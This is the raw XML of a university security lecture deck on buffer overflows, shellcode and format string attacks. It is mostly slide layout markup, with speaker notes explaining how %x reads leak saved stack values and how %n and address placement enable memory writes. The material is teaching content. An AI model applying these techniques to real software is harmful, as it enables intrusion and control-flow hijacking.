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33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81"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId82"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="289" r:id="rId3"/>
    <p:sldId id="479" r:id="rId4"/>
    <p:sldId id="472" r:id="rId5"/>
    <p:sldId id="473" r:id="rId6"/>
    <p:sldId id="474" r:id="rId7"/>
    <p:sldId id="489" r:id="rId8"/>
    <p:sldId id="475" r:id="rId9"/>
    <p:sldId id="476" r:id="rId10"/>
    <p:sldId id="477" r:id="rId11"/>
    <p:sldId id="478" r:id="rId12"/>
    <p:sldId id="417" r:id="rId13"/>
    <p:sldId id="405" r:id="rId14"/>
    <p:sldId id="414" r:id="rId15"/>
    <p:sldId id="415" r:id="rId16"/>
    <p:sldId id="490" r:id="rId17"/>
    <p:sldId id="491" r:id="rId18"/>
    <p:sldId id="492" r:id="rId19"/>
    <p:sldId id="493" r:id="rId20"/>
    <p:sldId id="494" r:id="rId21"/>
    <p:sldId id="413" r:id="rId22"/>
    <p:sldId id="470" r:id="rId23"/>
    <p:sldId id="406" r:id="rId24"/>
    <p:sldId id="418" r:id="rId25"/>
    <p:sldId id="459" r:id="rId26"/>
    <p:sldId id="421" r:id="rId27"/>
    <p:sldId id="422" r:id="rId28"/>
    <p:sldId id="423" r:id="rId29"/>
    <p:sldId id="424" r:id="rId30"/>
    <p:sldId id="460" r:id="rId31"/>
    <p:sldId id="425" r:id="rId32"/>
    <p:sldId id="465" r:id="rId33"/>
    <p:sldId id="467" r:id="rId34"/>
    <p:sldId id="468" r:id="rId35"/>
    <p:sldId id="469" r:id="rId36"/>
    <p:sldId id="428" r:id="rId37"/>
    <p:sldId id="480" r:id="rId38"/>
    <p:sldId id="427" r:id="rId39"/>
    <p:sldId id="407" r:id="rId40"/>
    <p:sldId id="429" r:id="rId41"/>
    <p:sldId id="431" r:id="rId42"/>
    <p:sldId id="430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2" r:id="rId53"/>
    <p:sldId id="443" r:id="rId54"/>
    <p:sldId id="444" r:id="rId55"/>
    <p:sldId id="462" r:id="rId56"/>
    <p:sldId id="463" r:id="rId57"/>
    <p:sldId id="464" r:id="rId58"/>
    <p:sldId id="449" r:id="rId59"/>
    <p:sldId id="471" r:id="rId60"/>
    <p:sldId id="450" r:id="rId61"/>
    <p:sldId id="451" r:id="rId62"/>
    <p:sldId id="488" r:id="rId63"/>
    <p:sldId id="452" r:id="rId64"/>
    <p:sldId id="453" r:id="rId65"/>
    <p:sldId id="487" r:id="rId66"/>
    <p:sldId id="481" r:id="rId67"/>
    <p:sldId id="482" r:id="rId68"/>
    <p:sldId id="484" r:id="rId69"/>
    <p:sldId id="485" r:id="rId70"/>
    <p:sldId id="486" r:id="rId71"/>
    <p:sldId id="454" r:id="rId72"/>
    <p:sldId id="455" r:id="rId73"/>
    <p:sldId id="456" r:id="rId74"/>
    <p:sldId id="457" r:id="rId75"/>
    <p:sldId id="416" r:id="rId76"/>
    <p:sldId id="458" r:id="rId77"/>
    <p:sldId id="461" r:id="rId78"/>
    <p:sldId id="268" r:id="rId79"/>
    <p:sldId id="38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289"/>
            <p14:sldId id="479"/>
            <p14:sldId id="472"/>
            <p14:sldId id="473"/>
            <p14:sldId id="474"/>
            <p14:sldId id="489"/>
            <p14:sldId id="475"/>
            <p14:sldId id="476"/>
            <p14:sldId id="477"/>
            <p14:sldId id="478"/>
            <p14:sldId id="417"/>
            <p14:sldId id="405"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Control Flow - Normal and Hijacks" id="{989ED019-1FFA-F940-B870-F90B67D4DA2C}">
          <p14:sldIdLst>
            <p14:sldId id="414"/>
            <p14:sldId id="415"/>
            <p14:sldId id="490"/>
            <p14:sldId id="491"/>
            <p14:sldId id="492"/>
            <p14:sldId id="493"/>
            <p14:sldId id="494"/>
            <p14:sldId id="413"/>
            <p14:sldId id="470"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Buffer Overflows" id="{6CD1A023-C06F-6249-A72B-C01F1102A147}">
          <p14:sldIdLst>
            <p14:sldId id="406"/>
            <p14:sldId id="418"/>
            <p14:sldId id="459"/>
            <p14:sldId id="421"/>
            <p14:sldId id="422"/>
            <p14:sldId id="423"/>
            <p14:sldId id="424"/>
            <p14:sldId id="460"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Shellcode" id="{D777AF99-4996-BE47-A2BB-43EA9399C26A}">
          <p14:sldIdLst>
            <p14:sldId id="425"/>
            <p14:sldId id="465"/>
            <p14:sldId id="467"/>
            <p14:sldId id="468"/>
            <p14:sldId id="469"/>
            <p14:sldId id="428"/>
            <p14:sldId id="480"/>
            <p14:sldId id="427"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Format String Attacks" id="{C80559F0-FF40-0641-AEF2-473EAECAB1A6}">
          <p14:sldIdLst>
            <p14:sldId id="407"/>
            <p14:sldId id="429"/>
            <p14:sldId id="431"/>
            <p14:sldId id="430"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Variadic Functions Detour" id="{28961BCA-36D5-1A45-85CE-15EF922EAE32}">
          <p14:sldIdLst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Format String Attacks - continued" id="{F3B76D16-0B77-F040-9E86-B5A7BF754D3D}">
          <p14:sldIdLst>
            <p14:sldId id="442"/>
            <p14:sldId id="443"/>
            <p14:sldId id="444"/>
            <p14:sldId id="462"/>
            <p14:sldId id="463"/>
            <p14:sldId id="464"/>
            <p14:sldId id="449"/>
            <p14:sldId id="471"/>
            <p14:sldId id="450"/>
            <p14:sldId id="451"/>
            <p14:sldId id="488"/>
            <p14:sldId id="452"/>
            <p14:sldId id="453"/>
            <p14:sldId id="487"/>
            <p14:sldId id="481"/>
            <p14:sldId id="482"/>
            <p14:sldId id="484"/>
            <p14:sldId id="485"/>
            <p14:sldId id="486"/>
            <p14:sldId id="454"/>
            <p14:sldId id="455"/>
            <p14:sldId id="456"/>
            <p14:sldId id="457"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Untitled Section" id="{D7EA7A6A-32A3-0249-95E4-C7E214963C1C}">
          <p14:sldIdLst>
            <p14:sldId id="416"/>
            <p14:sldId id="458"/>
            <p14:sldId id="461"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Conclusion" id="{9261A7F0-4603-054A-9F9B-B1F21EA47009}">
          <p14:sldIdLst>
            <p14:sldId id="268"/>
            <p14:sldId id="387"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Cherries" id="{37751250-D76E-2D45-9973-B6D261F82D1E}">
          <p14:sldIdLst/>
        </p14:section>
        <p14:section name="Stencils" id="{5C7432C3-426D-1C45-8ED1-B0E6FE16BAE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842"/>
    <a:srgbClr val="595A5A"/>
    <a:srgbClr val="A32D1E"/>
    <a:srgbClr val="FFFFFF"/>
    <a:srgbClr val="866C49"/>
    <a:srgbClr val="79463D"/>
    <a:srgbClr val="C00000"/>
    <a:srgbClr val="953735"/>
    <a:srgbClr val="F79646"/>
    <a:srgbClr val="B64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1845" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="46" d="100"/>
          <a:sy n="46" d="100"/>
        </p:scale>
        <p:origin x="1264" y="18"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2208"/>
        <p:guide orient="horz" pos="1440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608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tactic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> strategy: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>trailofbits.files.wordpress.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>/2010/04/practical-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>rop.pdf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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> put at 0xDEADBEEF? Or rather, what should we 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> put at 0xDEADBEEF? Or rather, what should we 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legal except members of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>structs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>, but compiler may still pad inside a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" baseline="0" dirty="0" err="1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once mixed, you need conventions.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> but bad guys break conventions.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9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Reason: Only the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> caller knows how many arguments were passed.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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> course </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>perl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 are interpreted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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Dropbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> as formatstring-ex1.c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A705-51B8-4348-804F-9E0F4659AF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interrelated:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> if you can hijack control flow into an infinite loop, or have a program prints out its stack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there</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> is no callee-save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Treat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> as a string, print it out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Print out format as a string, and then print ‘%’ because it’s the first charter in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>buf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dirty="0"/>
              <a:t>Last 2 things </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> printed are saved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> and saved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>. note that each %x is a 4 byte read, so 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> out is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>, then next 8 are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>, the 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>th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out is the saved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>, and the 11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> out is the saved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>eip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will skip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> 2, and print the string at the address signified by the first </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>dword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>. This motivates the next slide, on which we write the address to the beginning of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> before we do %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>x%s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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> in foo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>bonus question: what do you think the 516 digit number will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9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baseline="0" dirty="0"/>
              <a:t>(“Student </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>ID%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>\n”, &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>For each student id:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>(“%*d\n”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>, id);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5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baseline="0" dirty="0"/>
              <a:t>(“Student </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>ID%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>\n”, &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>For each student id:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>(“%*d\n”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>, id);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4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(while clobbering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> bytes at higher addresses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5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name of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> the register that contains the address of the current instruction?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34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overwritten part of canary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2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overwritten part of canary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5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overwritten part of canary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9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overwritten part of canary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7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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> trick to write 80 40 20 10 if in one write (80 140 220 310)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8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E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Have you figured out who Aleph One is?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> encourage you to use your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>fu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to learn more outside of classroom.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E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Have you figured out who Aleph One is?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> encourage you to use your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>fu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to learn more outside of classroom.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here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> is predetermined allocation.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lowest byte of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is 0;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> in little endian, that’s the least significant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argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> is corrupted because of the null terminator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16A47FA-0CEA-6947-B0F7-FA97FCD430B2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10A4823-B443-034C-8E87-89416A62590B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F6D151D-3159-114B-B1DE-9001868E6E90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0E3A481-0504-AD45-AE58-E2170EFE9EB5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3E2EA4C-5709-7B41-A68D-046FF53D6381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58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6C689A-AE09-9E43-848A-6052C5B1C2E2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8903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9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1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5EDE625-4126-0245-89C8-AEE31983CB2A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567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1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0FFAE3B-A5C0-6C4E-B9E0-B3451371FFB7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234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7F40-E7CB-184A-B2F3-E40763578D0C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99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4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1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7" y="1535114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7" y="1981201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59BA40D-6CDD-7A4C-B3C1-CAA2990B1E81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921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98AF1EE-6668-D545-93BB-33A37FAB2632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50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224741A-E944-D140-BC85-0B12196E47E2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3C9F0498-7466-264D-AFC6-960947520573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5070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2" y="273049"/>
            <a:ext cx="3008313" cy="1162051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2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4DA3EB2-9897-F247-9949-EB5DA088D0F6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320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619F0F-BEE0-C44D-841C-C0AD78046EBB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669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BD6D08-7990-7941-BB2B-F110DDF43BB6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219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09BD260-98D5-2C4E-9655-9188A2D2EA1F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89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175F-579F-654D-B842-834C46499D89}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2/3/2020</a:t>
            </a:fld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0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8E2CF58-ABF8-1542-93D6-7995FC9E4430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24FFC89-921A-FF44-8D48-0826225D1EE5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2A3E-4BFE-AF46-B61A-E662D0A37735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07D8CFC-0178-204C-AB67-9348AB6D8B74}" type="datetime1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C55D26C-3C72-B548-AB96-9791FD0CCC94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62C055-4756-1D4B-84FC-6EEB2240FC7D}" type="datetime1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9C52985-00EB-6941-9B53-ECA48ECB33FB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70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AD4E1B4A-1481-9A4D-AA6D-3A68B1E1E51A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1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B3A68C6-08BA-D848-899D-D60C0E1C4F5E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2/3/2020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6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26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file:///\\usr\include\stdio.h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3.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.jp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98423" y="203517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Exploits</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Buffer Overflows and Format String Attacks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733800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David Brumley</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Carnegie Mellon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AFE39-717F-4EE4-A9E5-060C53456575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="5334000"/>
            <a:ext cx="4856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With a few additional notes by Seth Nielson. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>All slides original except where marked.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863725"/>
            <a:ext cx="6400800" cy="72707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</a:rPr>
              <a:t>Which bugs are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>exploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000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6" name="Picture 20" descr="bsd-b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2" y="1600200"/>
            <a:ext cx="251498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51054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mbria"/>
              </a:rPr>
              <a:t>Evil David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10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4343400" y="4419600"/>
            <a:ext cx="4343400" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="snip1Rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="508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Today, we are going to learn how to tell.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25541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and Exploits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i="1" u="sng" dirty="0"/>
              <a:t>bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> is a place where real execution behavior may </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0"/>
              <a:t>deviate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> from expected behavior.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0"/>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> that gives an attacker an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07400"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="596900" y="3566795"/>
          <a:ext cx="7924800" cy="29260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Control Flow Hijack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Gain control of the instruction pointer </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty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sz="24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Denial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Cause program</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0"/>
                        <a:t> to crash or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stop servicing clients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 Disclosure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Leak private </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0"/>
                        <a:t>information,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e.g., saved password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12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Control Flow Hijacks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Common Hijacking Methods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Format String Attacks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What’s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Recap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3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05200" y="1263598"/>
            <a:ext cx="2362200" cy="53340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Process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1295400"/>
            <a:ext cx="2362200" cy="533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File system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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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1461374"/>
            <a:ext cx="1752600" cy="2805826"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect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Binary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8201" y="2057400"/>
            <a:ext cx="1295399" cy="1981200"/>
            <a:chOff x="1066801" y="2057400"/>
            <a:chExt cx="1295399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1066801" y="2057400"/>
              <a:ext cx="1295399" cy="6858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Code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1" y="2819400"/>
              <a:ext cx="1295399" cy="6096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6801" y="3581400"/>
              <a:ext cx="1295399" cy="4572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...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038600" y="36576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8600" y="46482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9400" y="2667000"/>
            <a:ext cx="2362200" cy="10668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Processor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33999" y="1535668"/>
            <a:ext cx="3806968" cy="1131332"/>
            <a:chOff x="5333999" y="1535668"/>
            <a:chExt cx="3806968" cy="1131332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="3" name="Elbow Connector 2"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="21" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5333999" y="1997333"/>
              <a:ext cx="2476501" cy="669667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1535668"/>
              <a:ext cx="3121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Fetch, decode, execute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342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333999" y="3733800"/>
            <a:ext cx="2802637" cy="1840775"/>
            <a:chOff x="5333999" y="3733800"/>
            <a:chExt cx="2802637" cy="1840775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5333999" y="3810000"/>
              <a:ext cx="2476501" cy="3810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21" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5333999" y="3733800"/>
              <a:ext cx="2476501" cy="13716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19800" y="5112910"/>
              <a:ext cx="211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read and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3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597E-6 3.98334E-6 L 0.34572 -0.06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86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1754-FDBB-44D3-89F9-3A5048AC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49DC-60E4-4291-BAD0-7AE92FE8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For temporary static variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Function call/return data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Generally, tightly managed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Global variables and dynamic variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hierarchical, “free floating”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fragmented, not tightly managed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F754E-8D89-49E6-9115-CF699BE8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6B1A-BF1B-4399-AE0F-F952C3A1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B4DC-F88E-43EF-8D48-E3E253D3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 err="1"/>
              <a:t>Funciton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There is no such thing in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rather, jump to new location (“function”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Save context of old location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
